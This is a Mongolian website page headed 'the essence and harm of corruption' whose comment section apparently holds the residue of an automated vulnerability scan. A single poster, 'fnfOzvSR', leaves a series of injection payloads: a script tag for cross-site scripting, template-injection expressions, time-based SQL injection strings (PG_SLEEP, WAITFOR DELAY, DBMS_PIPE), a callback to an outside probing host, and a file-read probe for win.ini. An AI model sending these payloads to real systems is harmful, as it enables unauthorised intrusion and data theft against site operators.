• Нүүр хуудас
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

АВЛИГЫН МӨН ЧАНАР ХОР ХӨНӨӨЛ

2019-11-13
fnfOzvSR 555
2023-03-02 Хариулах
fnfOzvSR
2023-03-02 Хариулах
fnfOzvSR <ScRiPt >tji6(9128)
2023-03-02 Хариулах
fnfOzvSR "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
2023-03-02 Хариулах
fnfOzvSR dfb__${98991*97996}__::.x
2023-03-02 Хариулах
fnfOzvSR dfb[[${98991*97996}]]xca
2023-03-02 Хариулах
fnfOzvSR @@qjcrh
2023-03-02 Хариулах
fnfOzvSR dfb{{98991*97996}}xca
2023-03-02 Хариулах
fnfOzvSR <%={{={@{#{${dfb}}%>
2023-03-02 Хариулах
fnfOzvSR '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2023-03-02 Хариулах
fnfOzvSR bfg9461<s1﹥s2ʺs3ʹhjl9461
2023-03-02 Хариулах
fnfOzvSR 9031404
2023-03-02 Хариулах
fnfOzvSR -5) OR 206=(SELECT 206 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
fnfOzvSR -1)) OR 508=(SELECT 508 FROM PG_SLEEP(15))--
2023-03-02 Хариулах
fnfOzvSR 1 waitfor delay '0:0:15' --
2023-03-02 Хариулах
fnfOzvSR -1; waitfor delay '0:0:15' --
2023-03-02 Хариулах
fnfOzvSR 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
2023-03-02 Хариулах
fnfOzvSR 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
2023-03-02 Хариулах
fnfOzvSR if(now()=sysdate(),sleep(15),0)
2023-03-02 Хариулах
fnfOzvSR "||sleep(27*1000)*jgkclr||"
2023-03-02 Хариулах
fnfOzvSR '||sleep(27*1000)*qntmll||'
2023-03-02 Хариулах
fnfOzvSR "&&sleep(27*1000)*bnduto&&"
2023-03-02 Хариулах
fnfOzvSR 1*
2023-03-02 Хариулах
fnfOzvSR 1*
2023-03-02 Хариулах
fnfOzvSR 1*
2023-03-02 Хариулах
fnfOzvSR sMJ8PUsU
2023-03-02 Хариулах
fnfOzvSR //xfs.bxss.me?gov.mn
2023-03-02 Хариулах
fnfOzvSR 974131
2023-03-02 Хариулах
fnfOzvSR xfs.bxss.me
2023-03-02 Хариулах
fnfOzvSR c:/windows/win.ini
2023-03-02 Хариулах